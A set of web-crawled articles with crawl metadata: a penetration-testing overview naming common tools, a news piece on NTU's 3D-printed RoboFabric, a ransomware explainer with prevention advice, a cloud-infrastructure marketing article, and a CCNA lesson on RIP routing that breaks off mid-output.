protocols.In Blind Testing The tester attempts to mimic the activities of a real hacker. Targeted testing, sometimes known as the lights-on technique, involves IT and penetration testing teams. Testing efforts and information about the goal and network design are known. Targeted tests take less time and effort than blind tests. Still, they don't always give as thorough a picture of an organization's security vulnerabilities and response capabilities as other testing methodologies. Tools For Common in Network Penetration Testing Pen testing provides IT teams with a new viewpoint on how to strengthen defenses, and it adds an effective set of tools and services to the armory of security professionals. These are some examples: - Scanners for ports - Scanners for vulnerabilities - Scanners for applications - Proxies for evaluating web applications 1. The Network Mapper (NMAP): NMAP is a tool that identifies flaws in an enterprise's network infrastructure. It may also be used to do audits. NMAP takes newly formed raw data packets and utilizes them to determine: What are hosts accessible over a certain network trunk or segment? The versions and types of data packet filters/firewalls used by every given host Organizations may use NMAP to construct a virtual map of a network segment and then determine the primary points of weakness that a cyber attacker might exploit. NMAP may be used at any stage of the pen testing process and is a free, open-source programme found at www.nmap.org. 2. Metasploit: Rather than a single tool, Metasploit offers a collection of pen-testing tools. It is a framework that is always improving to stay up with today's ethical hackers, who may also contribute to this platform. Metasploit, based on the PERL platform, comes with a plethora of built-in exploits that can be used to do various types of pen tests, and many are even customizable. For example, it already has a built-in network sniffer and multiple access points to mount and coordinate various types of cyber-based assaults. 3. Wireshark: It is a network protocol and data packet analyzer that can detect network problems and assess traffic for vulnerabilities in real-time. It emphasizes data packet features, origin, destination, and more by evaluating connection-level information and the elements of data packets. While it detects possible vulnerabilities, it still requires a penetration testing tool to attack them. W3AF (Web Application Attack and Audit Framework) is a pen-testing suite developed by Metasploit software developers. Its primary goal is to identify and exploit any security flaws in web-based applications, and it includes a plethora of tools for doing so. 4. John the Ripper: JTR is a quick and efficient password breaker that is now available for various operating systems (Unix, macOS, Windows, DOS, BeOS, and OpenVMS). Pen testers may use it to discover weak passwords and fix the underlying flaws in regular password use. JTR was designed and developed on an open-source platform, and it is available at http://www.openwall.com/john/. What Is the Main Goal of Penetration Testing? In recent years, penetration testing has become a frequently used security technique by enterprises. This is especially true for companies that retain and access sensitive or private information, such as banks or healthcare providers. While the primary goal of a pen test is to uncover vulnerabilities or exploit flaws, it is crucial to remember that the primary purpose of a pen test is frequently linked to a business objective with an overall strategy. As part of the Cyber Security Maturity Certification, Department of Defense contractors, for example, must have proper protocols in place to secure Controlled Unclassified Information (CUI) (CMMC). A penetration test is one of several security measures required to meet auditor criteria, depending on the degree attained by the contractor. On the other hand, the security objectives of a software firm might differ substantially. Application penetration testing, for example, aids in identifying vulnerabilities and weaknesses in code that may be vulnerable to an attack. Following that, developers strive to provide patches to update the codebase. Finally, the sorts of penetration testing done are determined by the business goals, which we shall discuss momentarily. Reporting on Results After the testing phase is completed, a report is generated and submitted to corporate leadership and business owners. This is the true worth of any penetration testing project. This report should give direction and recommendations for lowering risk exposure and practical measures toward resolution. It is vital to note that penetration testing reports are customised to satisfy a company's cyber security needs based on the following criteria: - How their network is configured. - Business goals for conducting a pen test - Software, servers, endpoints, physical controllers, and so on are all being tested. - The monetary worth of tangible or intangible assets is safeguarded. And a lot more! What Are The Various Methods Of Penetration Testing? Based on the information supplied and the sort of flaw to be discovered, testers choose one of three ways to penetration testing: 1. The white box The testers in a white box test have comprehensive knowledge of the system and its access. This technique aims to thoroughly test the system and collect as much information as feasible. In this situation, the advantage is that because the tester has unrestricted access and knowledge of the system, including code quality and internal designs, the Pentest may uncover even distantly situated vulnerabilities, providing a full picture of the security. 2. The black box As you might expect, the tester in this technique has no understanding of the system and constructs the test as an ignorant attacker. This method is the most realistic and requires a high level of technical expertise. This method takes the most time and costs more than the white-box method. 3. The grey box As the name implies, this method falls between white box and black box testing. The tester knows very little about the system. The advantage of this strategy is that the tester has a more targeted area of attack with little knowledge and avoids any trial-and-error manner of assault. What happens once a Pen Test is completed? For a long time, open-source software was known as "free software." Richard Stallman founded the free software movement with the GNU Project in 1983. The free software movement was structured around user freedoms: the freedom to read the source code, alter it, redistribute it—to make it available and function for the user in whatever way the user required it to operate. There is a free software alternative to proprietary or "closed source" software. Closed source software is extremely secure. Only the source code's owners have the legal right to view it. Closed source code cannot be legally edited or duplicated, and the user only pays to use the product as intended—they cannot modify it or share it with their community. However, the term "free software" has created some consternation. Free software does not always mean free to own; it simply means free to use however you see fit. "Free as in liberty, not beer," the community has attempted to explain. "The problem with the previous title, 'free software,' was not its political undertones, but that — to newcomers — the seeming concentration on price is distracting," said Christine Peterson, who invented the phrase "open source." September 9, 2024 September 5, 2024 August 20, 2024
<urn:uuid:4452e8b0-5b71-47fa-abd3-50caa5ab34cd>
CC-MAIN-2024-38
https://www.appknox.com/cyber-security-jargons/penetration-testing
2024-09-21T03:01:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00696.warc.gz
en
0.942258
2,017
3.078125
3
Nanyang Technological University (NTU) in Singapore has introduced a revolutionary 3D-printed fabric, aptly named “RoboFabric,” designed to transform medical support devices. This cutting-edge material combines flexibility and rigidity, promising significant enhancements in comfort and functionality for various medical applications. This exciting development underscores the potential of 3D printing technology in revolutionizing traditional medical supports. Introduction to RoboFabric The Inspiration and Design RoboFabric draws its innovative design from the natural world. Researchers at NTU took inspiration from the structural complexity of pangolins and octopuses, leading to the creation of a fabric consisting of interlocking tiles produced through precise 3D printing. Each tile is connected by metal fibers, which can contract to vastly increase the rigidity of the structure, enhancing its support capabilities. The result is a highly adaptable material that effectively combines the benefits of flexibility and firmness. The use of a mathematical algorithm in the design process ensures each segment of RoboFabric is customized to the specific needs of the user. This precision in production not only offers a bespoke fit but also maximizes the functional benefits of the material. The interlocking tiles enable the fabric to be both flexible and firm as needed, pushing the boundaries of what traditional medical fabrics can achieve. This unique design approach allows RoboFabric to serve a variety of medical applications, offering specific customization options that were previously unachievable with conventional materials. Flexibility and Rigidity on Demand One of the most striking features of RoboFabric is its ability to change its rigidity on demand. When metal fibers within the fabric contract, the overall structure can increase in rigidity by up to 350 times. This adaptability ensures that patients receive the exact type of support required at any given moment, making it ideal for a variety of medical conditions and needs. Such flexibility is crucial for patients who require different levels of support throughout their treatment or daily activities, providing a more responsive and effective solution compared to traditional supports. The flexibility of RoboFabric also facilitates ease of application and comfort for the wearer. Traditional rigid supports often cause discomfort and restrict movement, but RoboFabric offers a more user-friendly alternative. Being able to adjust the firmness as needed means patients can enjoy a greater degree of mobility while still benefiting from necessary support. This feature is especially beneficial in rehabilitation settings, where the requirements for support can change as a patient progresses through their recovery. Practical Applications in Medicine Reducing Muscular Effort A significant advantage of RoboFabric is its potential to reduce muscular effort for the wearer. According to NTU researchers, this innovative fabric can decrease muscular exertion by about 40%, making it particularly beneficial for the elderly and patients with compromised motor functions. This reduction in effort can lead to improved quality of life and faster recovery times. By minimizing the strain on muscles, RoboFabric can help prevent secondary injuries and facilitate a smoother, more comfortable recovery process. The ability to support and stabilize without overly straining the muscles represents a leap forward in patient care. For individuals with chronic conditions or those recovering from surgery, minimizing muscular effort is crucial in preventing further injury and promoting healing. Additionally, RoboFabric’s adaptable support can be particularly advantageous for patients with neurological conditions, where varying levels of muscle weakness and spasticity demand a more flexible support system. Prototypes in Limb Support Several prototypes have already been developed using RoboFabric, showcasing its versatility and effectiveness. An elbow brace designed with the fabric has demonstrated an enhanced load-bearing capacity, providing more robust support than traditional braces. Additionally, a wrist support prototype has been specifically crafted to help stabilize the joints of patients with Parkinson’s disease, offering critical support for managing tremors. These prototypes exemplify how RoboFabric can be tailored to address various medical needs. Each application highlights the material’s ability to enhance support, improve comfort, and adapt to specific user requirements. The practical implications for healthcare are vast, potentially aiding in the treatment and management of numerous conditions. These early prototypes provide a glimpse into the future possibilities of RoboFabric, suggesting that it could be adapted for other forms of medical support, including orthopedic aids and rehabilitation devices. The Future of Medical Support Devices The Shift Towards Personalization There is a growing trend towards personalized medical devices, and RoboFabric aligns perfectly with this trajectory. Traditional rigid casts are becoming obsolete as patients demand more customized and adaptable solutions. RoboFabric’s ability to be tailored to individual needs and its adaptive rigidity positions it at the forefront of this shift. This personalization trend reflects a broader movement within medical technology, where the focus is increasingly on creating bespoke solutions that address the unique needs of each patient. Assistant Professor Wang Yifan from NTU emphasized that the future of limb supports lies in personalization and adaptability. RoboFabric’s design not only responds to these demands but exceeds expectations, providing a flexible, user-friendly, and effective alternative to conventional supports. As healthcare continues to evolve towards more patient-centered models, technologies like RoboFabric are poised to play a significant role in delivering tailored care solutions that improve patient outcomes and satisfaction. Expert Insights and Clinical Implications Nanyang Technological University (NTU) in Singapore has unveiled an innovative breakthrough in the realm of medical support devices with its introduction of a revolutionary 3D-printed fabric known as “RoboFabric.” This pioneering material is engineered to integrate both flexibility and rigidity, aiming to significantly improve the comfort and functionality of various medical applications. Traditional medical supports often suffer from a lack of adaptability, leading to discomfort or limited movement for patients. However, RoboFabric addresses these limitations by offering a customizable, responsive fabric that molds to the user’s needs. This advanced 3D-printed fabric represents a substantial leap forward, highlighting the transformative potential of 3D printing technology in the healthcare sector. By replacing conventional materials with RoboFabric, medical devices can be tailored more precisely to individual requirements, thereby enhancing patient experience and outcomes. Whether used in braces, casts, or prosthetics, this material could revolutionize the way medical supports are designed and utilized. The development of RoboFabric underscores NTU’s commitment to pushing the boundaries of technology and improving patient care through innovative solutions.
<urn:uuid:5d388a89-e592-4d86-914e-8953e26622a2>
CC-MAIN-2024-38
https://manufacturingcurated.com/electronics-and-equipment/ntu-researchers-innovate-adaptive-3d-printed-medical-support-fabric/
2024-09-10T04:43:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00796.warc.gz
en
0.937161
1,306
2.703125
3
Ransomware is one of the most damaging types of malware, causing billion-dollar disasters every year. For businesses and individuals alike, a ransomware infection can mean losing irreplaceable files and spending weeks recovering computers. In this article, we’ll explore the definition of ransomware, how it works, and how to get it off of your computer. Like adware and spyware, ransomware is a type of malware. Unlike some other kinds of malware, ransomware has a very specific definition: it’s malicious software that encrypts the victim’s files and demands a ransom to decrypt them. Generally, the ransomware author requests their ransom in Bitcoin or another hard-to-trace cryptocurrency. While most types of ransomware only encrypt a user’s files, others threaten to publish them as well. Because of this, ransomware can be hugely damaging to an organization, both in terms of finances and reputation. Ransomware variants are constantly being developed. The surge of ransomware attacks spiked during the COVID-19 pandemic which revealed vulnerabilities in remote systems, since many workers switched to working from home. How ransomware works In a nutshell, ransomware abuses encryption, a technology for scrambling data, to prevent victims from accessing their data unless they pay up. After a victim unwittingly installs it, the ransomware follows a few general steps: - In the background, the ransomware program encrypts (or scrambles) the user’s files one by one, deleting the originals. - The ransomware displays the ransom message, either by changing the desktop background or by opening a custom application in full screen. - In the ransom note, the user is given an ultimatum: either they pay up and have their files restored, or the attacker throws away the encryption key and the files are lost forever. - On the same page as the ransom note, the program displays a Bitcoin (or other cryptocurrency) address. When the user purchases the right number of Bitcoin and sends them to the specified address, the user is given a file or password. - The user inputs the unlock key into some part of the ransomware program. Theoretically, the unlocker decrypts the user’s files and deletes itself afterwards. However, this doesn’t always happen: sometimes the criminal just takes the victim’s money and does nothing. Encryption is the same technology used to make online banking secure. It also secures your web browsing, instant messages, and emails (between major providers). However, hackers can also use encryption to lock their victims out of their own data. How does ransomware spread? There are a few different ways of infecting users with ransomware. Below, I answered some of the most burning questions about the spread of this malicious software: - Can ransomware spread through infected documents? Yes. Most types of ransomware arrive via infected downloads or email attachments. So-called document-based malware, where malicious Microsoft Office files house hidden malware, is becoming increasingly prevalent. All it takes is one click to “run macros” (and sometimes zero clicks, if the hacker uses a security bug) before your data is held ransom. - Can ransomware spread through Wi-Fi? Yes. Some ransomware spreads like a worm once it gets inside a network. In other words, it uses security vulnerabilities in software on the network to spread from computer to computer. Hackers often target vulnerabilities in file-sharing and remote desktop protocols. - Can ransomware spread through USB? Yes. If you borrow an infected flash drive from your friend and use it on your computer, it will catch ransomware. Unfortunately, ransomware is extremely quick once it gets into your system. It only takes a few seconds to encrypt all your files. That’s why you should focus on avoiding it in the first place. What are the types of ransomware? Ransomware has been one of the most popular and successful malware types these days. With it, cybercriminals can successfully block access to your own data and devices, steal sensitive information, and earn a fortune by forcing you to pay a ransom. That’s why ransomware is constantly evolving and even has 4 different types – locker, crypto, double extortion, and RaaS ransomware. But the two main ones are locker and crypto-ransomware. This type of ransomware completely blocks access to your device. It uses stolen credentials and social engineering techniques to get into the system. After it gets into the system, the cybercriminals demand for you pay the ransom. However, the damage doesn’t resolve as the intruders already have your data. By using this type of ransomware, the hacker seeks to decrypt your sensitive information by not compromising your computer’s functionality. Once the hacker is in, you can only see your files but not access them. At this point, you also receive a message informing you about the ransom and the possible loss of files if you don’t pay the required amount of money. As we can already see, ransomware is a quick and easy way to steal files and earn money for the bad guys. And one of the best ways to stay protected is to use the best ransomware protection from our listed software. How to prevent ransomware Most types of ransomware require some kind of user error to trigger. On occasion, ransomware will use security vulnerabilities in software or remote access protocols to spread. Generally, preventing ransomware attacks is similar to preventing other kinds of attacks. Here are some more specific recommendations: - Avoid opening downloads from untrusted sites. - Be careful with emails—don’t open attachments or links from untrustworthy or unknown senders. - Keep your operating system and software up to date. Make sure that your web browser, antivirus, and other security-critical software gets frequent updates. This can help to avoid ransomware that exploits security vulnerabilities. - Use background scanning mode in your antivirus software to make sure that every download is scanned for malware. Since you can’t effectively remove ransomware after it gets installed without wiping your computer, occasional scans won’t work. Other general security measures might keep ransomware at bay, but the user is the most important element of the security system. By being careful and skeptical of websites, emails, and other information on your computer, you can avoid ransomware. How to remove ransomware Since your files are completely encrypted, it’s impossible to remove ransomware without totally wiping and reinstalling your computer. You won’t be able to get back your files without having a backup from before the ransomware was installed. Here’s how to wipe and restore your computer: On a clean computer, make a bootable recovery drive specific to your operating system. You won’t need to use a second computer if you use a Mac. - On Windows, use Microsoft’s USB/DVD Download Tool. This is a free and easy download straight from Microsoft. - On macOS, boot from Recovery by holding down the Command and R keys after rebooting. The recovery drive is integrated into your operating system. - Reboot your computer from the external or internal recovery drive. Follow the on-screen instructions to wipe your hard drive and reinstall the operating system. - Reboot your computer when prompted and remove the recovery drive. On a Mac, don’t hold down any keys. - Set up your computer like new. After you finish setting it up, move your files from your backup onto your computer. - Avoid doing the same thing that caused the ransomware to get installed in the first place. If you weren’t following good security practices before, take the time to reevaluate your choices and be more careful next time. If you don’t have a backup of your files, you might be out of luck. In the final section of this article, we briefly discuss why you shouldn’t pay the ransom. There’s no guarantee that the criminal won’t simply take your money without restoring access to your files. On the other hand, if you’re fine losing your files, just wipe your computer completely and don’t restore any backups. In recent years, ransomware attacks have shown up in the news all the time. From the famous WannaCry attack that hit hundreds of major organizations to the Petya and NotPetya variants, ransomware has been a hot topic for a few years. You can see a summary of the most significant ransomware variants here: - WannaCry was the most well-known ransomware attack. By exploiting the EternalBlue security vulnerability in Microsoft Windows, it spread across the globe at an unprecedented speed. According to some estimates, the losses from this attack could top four billion dollars. - SamSam attacked critical infrastructure using stolen Microsoft Remote Desktop credentials. Unlike many other kinds of ransomware, victims of SamSam did not necessarily commit any kind of error on their own. - Locky arrived on victims’ computers through a fake Microsoft Word invoice that contained malware. The document appeared to be invalid and tricked the user into enabling macros to “re-encode” the document. After enabling Word macros, the victim’s computer would be locked with ransomware. - Petya and NotPetya are variants of a similar ransomware program that overwrote critical boot sectors on its victims’ computers. Compared to other types of ransomware, Petya uses low-level, more complete technique that renders victim systems completely inoperable. - Ryuk attacked enterprise systems in late 2018, more recently than many of these other ransomware examples. It uses fileless malware (including PowerShell scripting) to spread across corporate networks, quickly encrypting as many computers as it can. Should I pay if I get hit by ransomware? If at all possible, do not pay the ransom. By paying the ransom, you’re encouraging the ransomware authors to continue attacking other individuals and organizations. However, sometimes you can’t avoid paying the ransom because you don’t have backups and the value of your data exceeds the cost of the ransom. Remember that the ransomware authors have no incentive to actually unlock your files if you pay the ransom. Although most of the time they do unlock victims’ files, there is no guarantee. When a Kansas hospital was hit with a ransomware attack, their data was not returned, even after paying the ransom. Another reason to avoid giving in is the possibility that other malware was installed at the same time. Malware often comes in groups—even if you pay to remove the ransomware, your computer might still be infected with other, more subtle malware. If you prepared well and you have backups, wipe every infected computer and restore from your backups. This way, you’ll still have your data and won’t encourage cybercrime in the future. Can ransomware infect the external hard drive? Yes. Sometimes, ransomware can encrypt even external storage devices. To avoid this, don’t keep your external hard drive permanently connected to your computer. How common are ransomware attacks? Unfortunately, they are pretty common. It is estimated that a few thousand ransomware attacks occur every single day. Should you pay ransomware? If possible, no. Paying the ransom only encourages hackers to infect more devices. Also, there are no guarantees that your data will be decrypted. Can ransomware steal data? Yes. Some types of ransomware can steal all your personal data before encrypting your files.
<urn:uuid:7f54a680-7986-427f-acb5-412ed1f1248b>
CC-MAIN-2024-38
https://cybernews.com/malware/what-is-ransomware/
2024-09-12T16:31:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00596.warc.gz
en
0.916212
2,363
3.296875
3
What Is Cloud Infrastructure? How understanding the cloud can help transform your business. Cloud computing is increasingly critical in driving business efficiency and innovation in today’s digital age. From small businesses to large multinational corporations, businesses are shifting from traditional on-premises IT infrastructure to the cloud to harness its numerous benefits. But what does this buzzword we hear so often really mean? How does cloud infrastructure work? And more importantly, how can it transform your business? This article from FullScope IT takes a deep dive into cloud infrastructure, exploring its workings, benefits, challenges, and more. We’ll discuss various types of cloud computing, such as IaaS, PaaS, and SaaS, and look at different types of cloud architecture, including public, private, and hybrid clouds. Ultimately, understanding cloud infrastructure can empower you to leverage its full potential and transform your business to meet the modern challenges of the digital age. What Is Cloud Infrastructure? Cloud infrastructure refers to the blend of hardware and software components, like servers, storage, a network, and virtualization software, that support the delivery of cloud services. These can include data storage services, computing power, and networking features, among others. They are typically provided by Cloud Service Providers (CSPs) over the internet, replacing or supplementing the traditional on-premises IT infrastructure. Cloud infrastructure offers a model where resources are retrieved from the internet through web-based tools and applications rather than a direct connection to a server. This allows businesses to avoid the capital expense and complexity of owning and maintaining their own IT infrastructure and instead simply pay for what they use when they use it. What Are Cloud Service Providers (CSPs)? Cloud Service Providers, or CSPs, play an instrumental role in the world of cloud computing. These are the companies that deliver cloud services over the internet, allowing businesses to use computing resources without needing to own, operate, and maintain their own data centers. CSPs can range from tech giants like Google, with its Google Cloud platform, to specialized providers that cater to specific business needs. The key is to choose a cloud provider that aligns with your specific needs, whether that’s flexibility, robust security, or advanced data services. IaaS vs. PaaS vs. SaaS When it comes to cloud services, there are three primary models: Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS), and Software-as-a-Service (SaaS). These delivery models represent different levels of control, flexibility, and management in a cloud environment. In the IaaS model, the cloud provider offers the infrastructure components traditionally present in an on-premises, physical data center. This includes servers, storage, networking hardware, as well the virtualization or hypervisor layer. Companies using IaaS have control over their infrastructure as if it were in their own data center but without the physical management and maintenance requirements. Examples of IaaS include Google Cloud, Amazon Web Services (AWS), and Microsoft Azure. PaaS providers go a step further by providing all the resources required to build applications and services completely over the internet. In addition to the underlying storage, networking, and virtual servers, this also includes middleware, development tools, database management, business intelligence (BI) services, and more. PaaS is used by developers who want to create applications without worrying about the underlying infrastructure. Examples of PaaS include Google App Engine and Microsoft Azure. SaaS is a service model where the cloud provider hosts and manages the software application and underlying infrastructure and handles any maintenance, like software upgrades and security patching. Users connect to the application over the internet, usually with a web browser on their phone, tablet, or PC. Examples of SaaS include Google Workspace (formerly G Suite), Microsoft 365, and Salesforce. Components of Cloud Infrastructure Cloud infrastructure is typically divided into three primary components—compute, storage, and network resources—all working in tandem to offer a streamlined, scalable, and on-demand computing experience. - Compute resources form the backbone of the cloud infrastructure. These are the virtual machines (VMs) or web servers that can be created, scaled, or terminated as needed. They handle processing and executing all tasks and applications, providing unparalleled flexibility. - Storage resources cater to data needs in the cloud. They uphold a service model where data is managed, backed up remotely, and made accessible over a network, usually the internet. The design of cloud storage systems allows for easy scaling, offering users as much storage as they require at any time. - Network resources encapsulate all networking capabilities, including firewalls, load balancers, and networking equipment. These elements forge a secure and reliable connection between the user and their cloud resources. Public and private area networks form a critical part of the cloud infrastructure, linking users and data centers. In a cloud setting, these three components operate together. Compute resources or VMs run applications and workloads, offering the flexibility and scalability of virtualization. Storage resources offer accessible data storage depending on application needs. Network resources, a mix of physical hardware and software, ensure secure and efficient data communication. When using a cloud service, your applications run on compute resources, engage storage resources for data transactions, and network resources for communication. The elegance of cloud infrastructure lies in its transparency—applications appear to run on a local machine, while in reality, their operating systems are located on a server potentially thousands of miles away. How Does Cloud Infrastructure Work? At a basic level, cloud infrastructure operates on the principle of shared resources. Physical cloud resources, like servers and storage, are virtualized and partitioned into multiple ‘virtual’ resources that can be allocated as needed. This flexible, scalable approach is managed and orchestrated by software, meaning users can access and use these resources on-demand over the internet. There are primarily three models of cloud infrastructure deployment: public cloud, private cloud, and hybrid cloud. Each model has its own specific use cases, benefits, and potential challenges, and they are designed to cater to different organizational needs. Understanding these models is critical for businesses looking to tap into the power of the cloud environment. A public cloud is a type of cloud environment where cloud resources such as servers and storage are owned, operated, and managed by third-party cloud service providers. Users access these services and manage their accounts via the internet. Prominent public cloud providers include AWS, Microsoft Azure, and Google Cloud, offering services like computing power, storage, and data analytics. These services enable users to benefit from scalability and flexibility while circumventing the costs and intricacy of owning and managing on-premises IT infrastructures. The public cloud is available to the general public and dynamically shares resources (such as CPU cycles, storage, or bandwidth) among users on-demand. This resource-sharing model allows multiple users to utilize the same physical resources, enabling public cloud providers to offer highly scalable resources at reduced costs. While public clouds can be an ideal choice for organizations aiming to efficiently scale their IT infrastructure, it’s also crucial to be cognizant of threats targeting the shared security model and ensure adequate sensitive data protection measures. A private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources in an on-premises model, but a third-party service provider can also host it. The key element of a private cloud architecture is that services and infrastructure are maintained on a private network, offering greater control and security. Government agencies, financial institutions, or other medium-to-large organizations with heavy security regulations or control requirements often use private clouds. The infrastructure and services in a private cloud are always accessible and can be scaled on demand, providing companies with flexibility and agility. Unlike public clouds, private clouds typically require the company to purchase and maintain all the software and infrastructure, leading to higher costs. However, these costs may be offset by increased security and the ability to customize the cloud environment to the business’s specific needs. Private clouds offer many of the benefits of cloud infrastructure while giving businesses greater control and customization options, but without the scalability benefits of public clouds. However, there is a model that combines the features of both public and private clouds: the hybrid cloud. Hybrid cloud is a cloud computing environment that blends public clouds, private clouds, and on-premises infrastructures. A hybrid cloud architecture allows data and apps to move between the two environments, giving businesses greater flexibility, more deployment options, and optimizing existing infrastructure, security, and compliance. In a hybrid cloud model, certain resources are kept in the private cloud or on-premises, while other data and applications are stored in the public cloud. The key to a successful hybrid cloud is a seamless integration that allows for the smooth movement of data and applications between cloud resources. Hybrid clouds offer businesses the best of both worlds. They can maintain control of an internally managed private cloud while enjoying the benefits of public cloud computing, such as cost-effectiveness and scalability. The hybrid model is particularly attractive to businesses with dynamic or highly changeable workloads, as well as businesses that deal with big data processing, where the data can be processed in the public cloud, but the results are returned to the private cloud for localized analysis. Hybrid clouds can be complex, however, they require managing multiple vendors and security protocols, so it’s essential to have robust management tools in place. The cloud provider should have secure APIs and other tools for managing, orchestrating, and integrating all the different environments. Benefits of Cloud Computing Understanding the advantages of cloud computing is key to harnessing its power for your business. Some of the primary benefits include: - Cost-efficiency: Cloud services often operate on a pay-as-you-go model, meaning businesses only pay for what they use, resulting in significant cost savings. The expense of purchasing and maintaining an on-site physical infrastructure is replaced with a flexible subscription model that can scale with your business needs. Moreover, the economies of scale offered by cloud providers can further drive lower costs. - Scalability and Flexibility: One of the most considerable benefits of cloud computing is its scalability. Cloud infrastructure allows businesses to quickly and easily upscale or downscale their IT requirements as and when required. This level of agility can provide businesses using cloud computing a real advantage over competitors. - Accessibility and Collaboration: With cloud services, businesses can offer employees flexible working conditions and the tools they need to work from anywhere, on any device, improving work-life balance and increasing productivity. Cloud computing also makes collaboration a breeze, allowing multiple users to meet virtually and easily share information in real time and via shared storage. - Disaster Recovery and Business Continuity: In the face of unexpected events like natural disasters, power failures, or even human errors, cloud service can provide peace of mind with robust disaster recovery and business continuity plans. Data in the cloud is typically backed up across multiple servers, ensuring its availability and reducing the risk of data loss. Challenges of Cloud Computing While cloud computing offers numerous advantages, it also presents its own set of challenges that businesses must navigate to ensure a successful cloud adoption journey. These include: - Security Concerns: One of the major concerns businesses have about adopting cloud services is security. While most cloud providers offer robust security measures, including firewalls, encryption, and identity management tools, the responsibility for security is shared. Businesses must ensure their own cloud security practices, such as user access controls and security protocols, are robust and adhere to best practices. - Migration Complexities: Transitioning from a traditional on-premises infrastructure to a cloud environment can be complex and may cause disruption if not handled correctly. Cloud deployment requires careful planning and execution, including the selection of the right cloud provider, choosing the right cloud architecture (public, private, or hybrid cloud), and managing the migration of data and applications to virtual resources. - Management and Governance: Cloud infrastructure management requires new skills and tools. Governance policies must be put in place to manage costs, observability, performance, security, and service quality. - Vendor Lock-In: There’s always a risk of becoming too dependent on a single cloud provider. Switching providers can be costly and time-consuming, so it’s important to understand the terms and conditions from the outset and consider the use of multi-cloud strategies if necessary. Despite these challenges, the benefits of cloud computing typically outweigh the potential drawbacks for most businesses. Furthermore, many of these challenges can be mitigated with careful planning, sound strategy, and the help of knowledgeable managed service providers, like FullScope IT. How FullScope IT Can Help Transform Your Business with CloudServices Grasping the nuances of cloud infrastructure is a significant stride forward, but managing its intricacies while simultaneously running your business can be challenging. FullScope IT, equipped with vast experience in cloud services and IT solutions, offers a comprehensive approach that empowers businesses to relish the full benefits of cloud computing without the associated complications. Our team of experts at FullScope IT adopt a proactive approach to cloud services, offering round-the-clock supervision, quickly detecting and rectifying issues to ensure minimal service disruption. Our primary objective is to augment business continuity, thus permitting you to concentrate on what matters most—propelling your business forward. Choosing FullScope IT as your cloud services partner, you’ll benefit from: - Customized cloud solutions tailored to align with your business objectives. - Proactive protection against ever-evolving cybersecurity threats. - Scalable services that adapt seamlessly to your business growth. - Significant cost savings achieved through efficient resource management and reduced downtime. By entrusting your cloud computing needs to FullScope IT, you’re choosing peace of mind, knowing your cloud infrastructure is in competent hands. Allow FullScope IT to guide you through the process, simplifying the complexities and managing the challenges to ensure a robust, secure, and efficient cloud platform for your business. Ready to harness the power of the cloud to transform your business? Contact us today to discover more about our services and how we can assist you.
<urn:uuid:26d287b3-904e-4e14-a195-a5e9a29b0884>
CC-MAIN-2024-38
https://fullscopeit.com/2022/07/a-different-way-to-think-of-the-cloud/
2024-09-12T15:41:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00596.warc.gz
en
0.931926
2,972
2.984375
3
In this lesson we will introduce you to further more to Dynamic Routing, as this is a core requirement in your preparation for Cisco’s CCNA exam. Routing Information Protocol (RIP) is the first dynamic routing protocol ever invented and it’s important to understand how it works while learning for your CCNA certification. Routing Information Protocol (RIP) was the first protocol used in dynamic routing. Although modern networks do not use it today, it’s still popular in small networks because of its simplicity and in academic environments as a starting point of understanding how the routing process is working. Thus why Cisco includes it on the CCNA exam. RIP is a distance vector routing protocol. As all routing protocols are using a metric, the one used by RIP is the hop count. The shortest the hop count, the more likely RIP will chose that path to reach the destination network. However, RIP’s maximum hop count is 15(CCNA exam question). Any route with a hop count greater than 15 is considered unreachable. Routing updates are broadcasted by default every 30 seconds. They are sent in UDP packets with both source and destination port numbers set to 520. Because the maximum datagram size is only 504 bytes, there’s a maximum of 25 routes that can be announced in a single packet. Having more routes will cause the router to send more packets. There are only two message types used by RIP. Request message and Response message. The names are as descriptive as they can be. When a RIP enabled router interface comes up, it sends out a Request message. The other RIP enabled routers in the network are responding with Response messages. When the first router receives the Response messages, it installs the new received routes in it’s routing table. If the router already has a route in it’s table but it gets one with a better hop count, the old route is replaced. After that, the router sends its own routing table to its neighbors. The default Administrative Distance for RIP is 120(another CCNA exam question). In routing, the AD is used as a reference of trustworthiness. The lower the value, the higher the priority of that route. For example, if you have a route received through RIP, which has an AD of 120, and you have the same route received from a higher priority protocol like OSPF, which has a default AD of 110, OSPF will be in charge to route the packets through its route, even if the routing protocol metric is greater. Due to its lack of scaling capabilities, RIP is the least-preferred protocol from all Interior Gateway Protocols (IGPs). There are three versions of RIP. RIPv1, RIPv2 and RIPng, but only the first two are required for the CCNA certification. RIPv1 is the first version of this protocol. The main disadvantage of this protocol is that it’s a Classful Routing Protocol, meaning that you cannot use Variable Length Subnet Masking (VLSM). The configuration of the RIPv1 protocol is pretty straight forward. You must enable RIP routing with the router rip global configuration command, then specify the networks you want to announce with the network network-address command. RIPv1 assumes the default subnet mask for the IP address you specify. The default masks are: class A – 255.0.0.0, class B – 255.255.0.0, class C – 255.255.255.0. Please note that if you will enter a classless IP address like 192.168.1.32 the router IOS will convert it automatically to the classless one, 192.168.1.0. To check that RIP is receiving updates from other routers, you use the show ip route command. RIP routes can be easily identified as they are prefixed with R. Also, show ip protocols can give you plenty of informations if you want to check if you correctly advertise your routes to others. Router#show ip route Codes: C – connected, S – static, I – IGRP, R – RIP, M – mobile, B – BGP Gateway of last resort is not set
<urn:uuid:848247be-826e-4141-ae28-fb1eceb7b891>
CC-MAIN-2024-38
https://www.certificationkits.com/ccna-concept-routing-information-protocol-rip/
2024-09-13T22:03:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00496.warc.gz
en
0.901728
867
3.859375
4
